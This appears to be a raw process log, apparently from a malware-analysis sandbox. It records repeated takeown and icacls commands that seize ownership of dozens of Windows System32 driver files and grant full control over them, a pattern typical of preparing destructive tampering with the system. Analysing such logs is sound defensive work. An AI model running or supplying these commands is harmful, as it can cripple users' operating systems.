C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpsd.sys && icacls C:\Windows\System32\drivers\dumpsd.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\drmkaud.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Dumpata.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpsdport.sys && icacls C:\Windows\System32\drivers\dumpsdport.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpstorport.sys && icacls C:\Windows\System32\drivers\Dumpstorport.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dumpfve.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dumpsd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms2.sys && icacls C:\Windows\System32\drivers\dxgmms2.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Dumpstorport.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dumpsdport.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dumpsd.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Dumpstorport.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\EhStorClass.sys && icacls C:\Windows\System32\drivers\EhStorClass.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dxgkrnl.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\EhStorTcgDrv.sys && icacls C:\Windows\System32\drivers\EhStorTcgDrv.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dumpsdport.sys /grant "Admin:F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dxgmms1.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dxgmms2.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\EhStorClass.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dxgmms2.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\EhStorTcgDrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\EhStorTcgDrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filecrypt.sys && icacls C:\Windows\System32\drivers\filecrypt.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\EhStorClass.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\errdev.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\evbda.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\exfat.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fdc.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fileinfo.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fastfat.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\filecrypt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\filecrypt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\filetrace.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fltMgr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\flpydisk.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fsdepends.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fs_rec.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\fvevol.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gpuenergydrv.sys && icacls C:\Windows\System32\drivers\gpuenergydrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\gm.dls
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\gmreadme.txt
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\gpuenergydrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hdaudbus.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\gpuenergydrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\HdAudio.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidi2c.sys && icacls C:\Windows\System32\drivers\hidi2c.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidinterrupt.sys && icacls C:\Windows\System32\drivers\hidinterrupt.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidbatt.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidi2c.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidbth.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidclass.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidinterrupt.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidspi.sys && icacls C:\Windows\System32\drivers\hidspi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidi2c.sys /grant "Admin:F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidinterrupt.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidir.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidparse.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidspi.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\HpSAMD.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidusb.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidspi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hvcrash.sys && icacls C:\Windows\System32\drivers\hvcrash.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hvservice.sys && icacls C:\Windows\System32\drivers\hvservice.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\http.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hvsocket.sys && icacls C:\Windows\System32\drivers\hvsocket.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hvcrash.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hvservice.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hyperkbd.sys && icacls C:\Windows\System32\drivers\hyperkbd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hvservice.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hvcrash.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HyperVideo.sys && icacls C:\Windows\System32\drivers\HyperVideo.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hvsocket.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hwpolicy.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hyperkbd.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iagpio.sys && icacls C:\Windows\System32\drivers\iagpio.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hvsocket.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\HyperVideo.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hyperkbd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iai2c.sys && icacls C:\Windows\System32\drivers\iai2c.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\i8042prt.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\HyperVideo.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iagpio.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iagpio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iai2c.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iai2c.sys /grant "Admin:F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSSi_GPIO.sys && icacls C:\Windows\System32\drivers\iaLPSSi_GPIO.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSSi_I2C.sys && icacls C:\Windows\System32\drivers\iaLPSSi_I2C.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_I2C.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorAVC.sys && icacls C:\Windows\System32\drivers\iaStorAVC.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSSi_GPIO.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ibbus.sys && icacls C:\Windows\System32\drivers\ibbus.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSSi_I2C.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSSi_GPIO.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IndirectKmd.sys && icacls C:\Windows\System32\drivers\IndirectKmd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSSi_I2C.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaStorAVC.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaStorAVC.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaStorV.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ibbus.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelpep.sys && icacls C:\Windows\System32\drivers\intelpep.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelpmax.sys && icacls C:\Windows\System32\drivers\intelpmax.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\IndirectKmd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ibbus.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelpep.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\IndirectKmd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IntelTA.sys && icacls C:\Windows\System32\drivers\IntelTA.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelpmax.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelpep.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iorate.sys && icacls C:\Windows\System32\drivers\iorate.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelppm.sys
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelpmax.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
